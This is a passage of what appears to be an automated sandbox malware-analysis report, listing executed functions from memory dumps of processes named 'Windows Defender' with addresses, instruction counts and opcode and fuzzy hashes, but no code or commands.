                                      • Opcode ID: 14ddd4a0f42e7a6074b2b8a67c4a261c498d6d6abf4f4479b7d74df721b35bc2
                                      • Instruction ID: 8b919dea726b798993a1ba0113260dba7f0df200c840bd0b46e4167b825b4c39
                                      • Opcode Fuzzy Hash: 14ddd4a0f42e7a6074b2b8a67c4a261c498d6d6abf4f4479b7d74df721b35bc2
                                      • Instruction Fuzzy Hash: 9A219572F1491E4BEB94EB98D8A61FD77F1FF95311F500136D14EF2292DD6868029780
                                      Function 00007FFD34690D48 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a0397f729d0e7e41455b85720d479789cccd7c7eee38dd7e170acbc990801ff5
                                      • Instruction ID: 24d782f5cfbef73a1acd4f333003a3345614296c0fc24bb6615e5e2cdc2e985f
                                      • Opcode Fuzzy Hash: a0397f729d0e7e41455b85720d479789cccd7c7eee38dd7e170acbc990801ff5
                                      • Instruction Fuzzy Hash: 4221A411B18D1A4BFB90BBEC946A3BEA2D2EF98712F24017AE00DD32C2DD6868014791
                                      Function 00007FFD3469086D Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0bab0b69d3ec359a008bb1292d6e8cbb90774e3e350705c7aca1e1d55fa3a03c
                                      • Instruction ID: 8cc7f5259cd4e477d1285524fe46dd4fad8a0d531e7dd0bbe5b736c9400e3460
                                      • Opcode Fuzzy Hash: 0bab0b69d3ec359a008bb1292d6e8cbb90774e3e350705c7aca1e1d55fa3a03c
                                      • Instruction Fuzzy Hash: 74218379B74B094FD799FBA8C0B96A97FA2FB98204FC08468D44DC3386DD746940C751
                                      Function 00007FFD34692291 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a5d59f8934c2d12b7be19209e88ba771cc39a620c65db09eb2994b62bb640b50
                                      • Instruction ID: 5b2565933f8309aff73ab666f2b88677e51d29326f231a307d0054d7c12331d2
                                      • Opcode Fuzzy Hash: a5d59f8934c2d12b7be19209e88ba771cc39a620c65db09eb2994b62bb640b50
                                      • Instruction Fuzzy Hash: 07012B15E0CBD10FE796AA3858A55B57FE0DFD6311B080DBBD889C61E7D88C5940D392

                                      Executed Functions

                                      Function 00007FFD346616E9 Relevance: .7, Instructions: 702COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8d391050a3de08c8fa124f2f31cdb3a5bce540ff69d697eb0a283031b0250654
                                      • Instruction ID: 1c16a1e6273c63af9682f70d399476ac03095f8fb0ed1aa9808795d60f12382c
                                      • Opcode Fuzzy Hash: 8d391050a3de08c8fa124f2f31cdb3a5bce540ff69d697eb0a283031b0250654
                                      • Instruction Fuzzy Hash: 2322A260B28A595FE7A4FB7C84A97B9B7D2FF99314F44057DE04EC3292DE2CA8018741
                                      Function 00007FFD34660E5E Relevance: .3, Instructions: 282COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b092d772f0456c5779322087e746479ce0d797adab1f593b221151b5c97ffed0
                                      • Instruction ID: 7ed3945f84b758f2a8f513b2f9ab1ce56c2e3c1a0262b7c331a0ea58966fb690
                                      • Opcode Fuzzy Hash: b092d772f0456c5779322087e746479ce0d797adab1f593b221151b5c97ffed0
                                      • Instruction Fuzzy Hash: 3071F412B4D7960EE362B6BCA4651FA2B95DFD6235B0841BFD4CCCA0A3DD0C68878791
                                      Function 00007FFD346620C1 Relevance: .2, Instructions: 206COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ae5e843f70794d22443d2ccbb20ac0f41573cadfc727960b5f38469e71a1e6a
                                      • Instruction ID: 1f432f9af8dcfeacce4b4b943b94d8b33c0009e1889e8b29a881efe4374a8f2e
                                      • Opcode Fuzzy Hash: 6ae5e843f70794d22443d2ccbb20ac0f41573cadfc727960b5f38469e71a1e6a
                                      • Instruction Fuzzy Hash: 9151F050B1E6C50FE796ABB858752A5BFD5DF87229B0804FFE0CAC6193DD1C1806C342
                                      Function 00007FFD346611F2 Relevance: 1.8, Strings: 1, Instructions: 582COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: a665208f2d38aba31b59fc36533e3cea1dda4cff9997137518371a34723b8ca7
                                      • Instruction ID: 500a5fd458433b7ada46cd96603cfba501043f55333d8727b0d649ba1cc8a114
                                      • Opcode Fuzzy Hash: a665208f2d38aba31b59fc36533e3cea1dda4cff9997137518371a34723b8ca7
                                      • Instruction Fuzzy Hash: 4D51F826F0D6960FD711EBACE4B11EA7FB0EF96229B0801B7D1CCDA193DD1868498790
                                      Function 00007FFD346611F0 Relevance: 1.8, Strings: 1, Instructions: 578COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: 5fd4b814d4032bb2fed2bf80d1735549ba2676100a891fab86181ae80f3213fe
                                      • Instruction ID: 04af15a3eff337c1ce64d1b88a7bb7f6a351c9d33433bb07cbff9a7b3798d462
                                      • Opcode Fuzzy Hash: 5fd4b814d4032bb2fed2bf80d1735549ba2676100a891fab86181ae80f3213fe
                                      • Instruction Fuzzy Hash: 6951D526F0D6560ED751EBACE4A11EA7BB0EFD6229B0801B7D1CCEA193DD1868498790
                                      Function 00007FFD346607CF Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;O_
                                      • API String ID: 0-3800132730
                                      • Opcode ID: 2c3842cfd02a54bbee9fbc284bbac2273f2de97865d71fd8b5454aa000cdf38e
                                      • Instruction ID: 56f3662b0ee88158c7b1a1ab36bd7a64efe9bc3ad4b3264c6a822874165bb554
                                      • Opcode Fuzzy Hash: 2c3842cfd02a54bbee9fbc284bbac2273f2de97865d71fd8b5454aa000cdf38e
                                      • Instruction Fuzzy Hash: 8031E031A59B5A9BDB52EBACD0B95E97FA0EF95314F8044BDE14DC3382DE2868008B40
                                      Function 00007FFD346612B8 Relevance: .5, Instructions: 489COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18717d4e0fd85df64de7705046b2c6a270f10b58494884097310602a3c7683dc
                                      • Instruction ID: 54d7e1a095084e5292bf3690195df756e590dd0b5937403254314d20e571dfb5
                                      • Opcode Fuzzy Hash: 18717d4e0fd85df64de7705046b2c6a270f10b58494884097310602a3c7683dc
                                      • Instruction Fuzzy Hash: B631F522F18A4A4FDB51DBA8C8A51ED7BB1EF96210F4401BBD18DE71A3DE2C6C058390
                                      Function 00007FFD34660AFB Relevance: .2, Instructions: 207COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 793e7c8cc97219571e1c69c40db8a8cebf7689f4fc7ad5da0310468cc0b6c36f
                                      • Instruction ID: 53bd49af1311ce398d341bcae696eb0ebf2ee14baad352db1582c9edd072f1f5
                                      • Opcode Fuzzy Hash: 793e7c8cc97219571e1c69c40db8a8cebf7689f4fc7ad5da0310468cc0b6c36f
                                      • Instruction Fuzzy Hash: 3251C836B48A2A4BD710FBECE4656FE73A4FFD4329F44453AD108D7282CE2D64458B90
                                      Function 00007FFD34660B6F Relevance: .2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ffafc537da4a99782facd3a7f24e924eb9b65355789820a7b62a8de940231d4
                                      • Instruction ID: 75d4f01693a3a763ce5830400d003965c2f60860cf32f02284508ce6953afcb9
                                      • Opcode Fuzzy Hash: 3ffafc537da4a99782facd3a7f24e924eb9b65355789820a7b62a8de940231d4
                                      • Instruction Fuzzy Hash: D141D636B18A1A9FDB40FBA8D4656ED77E1FFD4315F50053AD109D7282CE38A8468B90
                                      Function 00007FFD34660638 Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb4baa45ebee5e9388f65666893c8758f39ea53c8c881a50f5998e4a163e3a2b
                                      • Instruction ID: f0f9fbb252b7d90a713b26ebc09be3dcc5593980de3f6c541e75eac44d7715fc
                                      • Opcode Fuzzy Hash: cb4baa45ebee5e9388f65666893c8758f39ea53c8c881a50f5998e4a163e3a2b
                                      • Instruction Fuzzy Hash: 36317521B1D9490FE798FB6C946A2B9B6C2EFD9315F0405BEE04EC3297DD68AC418741
                                      Function 00007FFD34660D48 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: acb68e1d694795412812e15402e448f4c8ef3a73163a21b3168e75216e698645
                                      • Instruction ID: 943b3d2735b0ca76a00ae08db951566076191f607414fe615d336e2e538aeb3e
                                      • Opcode Fuzzy Hash: acb68e1d694795412812e15402e448f4c8ef3a73163a21b3168e75216e698645
                                      • Instruction Fuzzy Hash: 5321D811B18D1A4BFB90BBEC946A3FEB2D2EF98712F10017AE10DD3283DD2C68014791
                                      Function 00007FFD3466086D Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ecf9d758ccae1c26e5eebf809d07c7280d8c2af95cef853e34923e5503c24fe8
                                      • Instruction ID: c1eca76e4b9de0a8a24479379f6e520130cdacd921b54483f47a325a3a0017fd
                                      • Opcode Fuzzy Hash: ecf9d758ccae1c26e5eebf809d07c7280d8c2af95cef853e34923e5503c24fe8
                                      • Instruction Fuzzy Hash: 9E219235B54B095FD752EBACC0A9AA9BFE1FF98304F8044ACD54EC3386DE3469018B41
                                      Function 00007FFD34662291 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ccabb6f9313ce47387222a860258b6dd95d1a1ee6461721cda0d08c6348906ae
                                      • Instruction ID: 34452d1318adb014e69a8ad62243a15f6cafb3dbb8acf2469a709be15c1ddf2f
                                      • Opcode Fuzzy Hash: ccabb6f9313ce47387222a860258b6dd95d1a1ee6461721cda0d08c6348906ae
                                      • Instruction Fuzzy Hash: 24014710A0DB910FE742AA381CA91B17FE09BD6321B0808BBD889C60EBD80C59409382

                                      Executed Functions

                                      Function 00007FFD346816E9 Relevance: .7, Instructions: 705COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8eeccb5d1a26a81531d97f89552ea3ed978dd11230d9bb674fec4ed7c54c5a34
                                      • Instruction ID: a777ef6ad615fab57a15e24d195e843402e6940dbd6174de86333fec86952655
                                      • Opcode Fuzzy Hash: 8eeccb5d1a26a81531d97f89552ea3ed978dd11230d9bb674fec4ed7c54c5a34
                                      • Instruction Fuzzy Hash: 59229261B28B594FE7A4EB6884A97FA77D2FF9D301F440579E44EC3283DE28A8418741
                                      Function 00007FFD34680E5E Relevance: .3, Instructions: 278COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f812544630abda3f8b31c3888ba62b6e24cb81d56b1ecef15c1949e22616908
                                      • Instruction ID: 152a2d6f43a4fbf7b68039a7b62b8958a51d870c5824c3f5c2a86796e872fc72
                                      • Opcode Fuzzy Hash: 2f812544630abda3f8b31c3888ba62b6e24cb81d56b1ecef15c1949e22616908
                                      • Instruction Fuzzy Hash: 46713612B5D7960EE362B7BCA8651FA2B95DFD722570981BBD0CCCB1A3DC0C28478391
                                      Function 00007FFD346820C1 Relevance: .2, Instructions: 206COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd9e1deb90926d50bcc1f139e807bf6cde4e9d4065436603642fc41b84699a8b
                                      • Instruction ID: 2b359268038d6fae39a8e39ba80a9758089828c3dd1f3dc1dd6e9e286b820c2b
                                      • Opcode Fuzzy Hash: cd9e1deb90926d50bcc1f139e807bf6cde4e9d4065436603642fc41b84699a8b
                                      • Instruction Fuzzy Hash: 2A51F010B1E6C50FE796ABB898B42B57FD5DF8721AB1804FFE0CAC6193DD581806C342
                                      Function 00007FFD346807CF Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;M_
                                      • API String ID: 0-2554412826
                                      • Opcode ID: b67610c5bba621a9cb739e4e3c8cb39dcb3f14de728dd11a76b674b1071f6514
                                      • Instruction ID: 9db6e178cc7243905bab6260aee0972306f1006b7fbe890292294023be714008
                                      • Opcode Fuzzy Hash: b67610c5bba621a9cb739e4e3c8cb39dcb3f14de728dd11a76b674b1071f6514
                                      • Instruction Fuzzy Hash: E531C471B4DB5A8FD762EBA8D4A51EA7FA1FF9D206B4144B9D04DC3383DD3868408B81
                                      Function 00007FFD346812B8 Relevance: .5, Instructions: 489COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b914b6649e16ace1413cdb5ee18066fc7a0f12288609fe062e2165d7336dc00
                                      • Instruction ID: 0782651f91ba3fe7e8931e14f1e6a4529b181a921d0e305d710477e56561b387
                                      • Opcode Fuzzy Hash: 4b914b6649e16ace1413cdb5ee18066fc7a0f12288609fe062e2165d7336dc00
                                      • Instruction Fuzzy Hash: 4731CF62F19A5E4FEB819BA8C8A51ED7FB1EF9A201F4502B7C189E3193DD2868419340
                                      Function 00007FFD34680AFA Relevance: .2, Instructions: 209COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9588ca1bddf220a90a03c058ba20098c7c258c9006d155f4588ceb53fefddb0
                                      • Instruction ID: 714e039ef3622275a7a61779bee8bbd0b14fc57a874eedd76ca065daf0bcf61d
                                      • Opcode Fuzzy Hash: c9588ca1bddf220a90a03c058ba20098c7c258c9006d155f4588ceb53fefddb0
                                      • Instruction Fuzzy Hash: 9D51B936B09B2E8BDB50BBECE4611FE73A0EFD5326B15067AD148D7283CD3964418790
                                      Function 00007FFD34680B6F Relevance: .2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9af3642992f7915ddcfdd97a8d13432740bf579f90f6d546ed8a5ee2c8b38f5d
                                      • Instruction ID: 0613d256793cde967399b649737c6037e26fc2c8ef9a309a23815c2509554114
                                      • Opcode Fuzzy Hash: 9af3642992f7915ddcfdd97a8d13432740bf579f90f6d546ed8a5ee2c8b38f5d
                                      • Instruction Fuzzy Hash: 2E41D636B19A1E8FDB54FFA8D8616EE73E1FF99316F50067AD009D7282CD3964428780
                                      Function 00007FFD34680638 Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2929f8022d2bbc177311f713119a7683b7fcf962cd123de198dbc1b22be8a4b
                                      • Instruction ID: 76a9a148c6353473f8bd70b0d8da3396599fde6c9f57e96ff5c2c96bb1197a61
                                      • Opcode Fuzzy Hash: d2929f8022d2bbc177311f713119a7683b7fcf962cd123de198dbc1b22be8a4b
                                      • Instruction Fuzzy Hash: 8331C521B1D9490FE798FB6C946A2B9B7C2EFD9315F0405BEE04EC3293DD68AC028341
                                      Function 00007FFD346815DB Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e034130c7a9df2124f89fe274d0bc0f8588f863390713655f1c44130cacda14
                                      • Instruction ID: 3be54c26aec150211bb1910f33b6bbebe2c7e1d983d58367c55f85736e082900
                                      • Opcode Fuzzy Hash: 0e034130c7a9df2124f89fe274d0bc0f8588f863390713655f1c44130cacda14
                                      • Instruction Fuzzy Hash: 9121B262F1491E4BEB94EB98C8A52FDBBF1FF99311F410276D14EF2292DE2868419740
                                      Function 00007FFD34680D48 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a2e89406b487610b84e83c18ccd4167b732de7354e35961d3489176960bf840
                                      • Instruction ID: 33e4e16cca5cdef36a18a4e58bce8167d6301328fc1e12324fed554ee22c08ff
                                      • Opcode Fuzzy Hash: 0a2e89406b487610b84e83c18ccd4167b732de7354e35961d3489176960bf840
                                      • Instruction Fuzzy Hash: EB219912B18E1A4BFB94BBEC946A3FEB2D2EF98712F14017AE10DD3297DD2868014751
                                      Function 00007FFD3468086D Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d554aefe781239c90c97737bef5426f5ac683424b70dbd9c7a1b84e49551a14
                                      • Instruction ID: b9a9bc31fe23c393e6ad9061756a5fe733fada8549d6fdc6b738cbdb3613789d
                                      • Opcode Fuzzy Hash: 9d554aefe781239c90c97737bef5426f5ac683424b70dbd9c7a1b84e49551a14
                                      • Instruction Fuzzy Hash: 64219275758B498FD762EBA8C0A16EB7F71FF9C206B8144A8D44DC3387DE3869008780
                                      Function 00007FFD34682291 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c8b13a49e16a7cd8c544aa31db8f4cdf2e7041dd6c6b8a24cbb03cabf0cab55
                                      • Instruction ID: 6739d0db5623bc3b143839062810cba9bf5e14e920b77f60a35f44ac2799a55d
                                      • Opcode Fuzzy Hash: 9c8b13a49e16a7cd8c544aa31db8f4cdf2e7041dd6c6b8a24cbb03cabf0cab55
                                      • Instruction Fuzzy Hash: 43012B55A0DBA10FE7D2AB3898B55B17FE0DFD6211B0809BBD88AD61D7D80CA9409392

                                      Executed Functions

                                      Function 00007FFD346916E9 Relevance: .7, Instructions: 703COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 781c917a8f9baa450e3e0eec86d3caa30e57d139944b454fb5a7a0c34df30920
                                      • Instruction ID: b48da2590edd8db1c641f22e1c6db2e650644c7a63a800132863a4e6315f1469
                                      • Opcode Fuzzy Hash: 781c917a8f9baa450e3e0eec86d3caa30e57d139944b454fb5a7a0c34df30920
                                      • Instruction Fuzzy Hash: 2022C371B28A5A4FE794FB7884A97BA77D2FF99300F540579E04EC32C6DE78A8018741
                                      Function 00007FFD34690E5E Relevance: .3, Instructions: 283COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 53b8bf492868041f1051301dd66a5c0881b34da142cfb522bf5fb735b3b7e956
                                      • Instruction ID: 0164f0f5e34f2582d3b842993cc3e960742f28112d901dea354c836c3983b850
                                      • Opcode Fuzzy Hash: 53b8bf492868041f1051301dd66a5c0881b34da142cfb522bf5fb735b3b7e956
                                      • Instruction Fuzzy Hash: F081F412B4D7960EE362B7BCA4651FA2B95DFD6235B0840BBD0CCCA1A3DC0868478792
                                      Function 00007FFD346920C1 Relevance: .2, Instructions: 206COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f1f8f3f38bcd5e399b473d4caf070388347ef110d13b1d2cc4dfd94f31af3db
                                      • Instruction ID: d45ce556143b85f489e8c7ec5ca27c65364a4c783d39f34eabc325220ecb69fe
                                      • Opcode Fuzzy Hash: 0f1f8f3f38bcd5e399b473d4caf070388347ef110d13b1d2cc4dfd94f31af3db
                                      • Instruction Fuzzy Hash: 0E51F010B1E6C50FE796ABB858B52B57FD5DF87229B0808FFE0CAC61A3DD581816C342
                                      Function 00007FFD346907CF Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
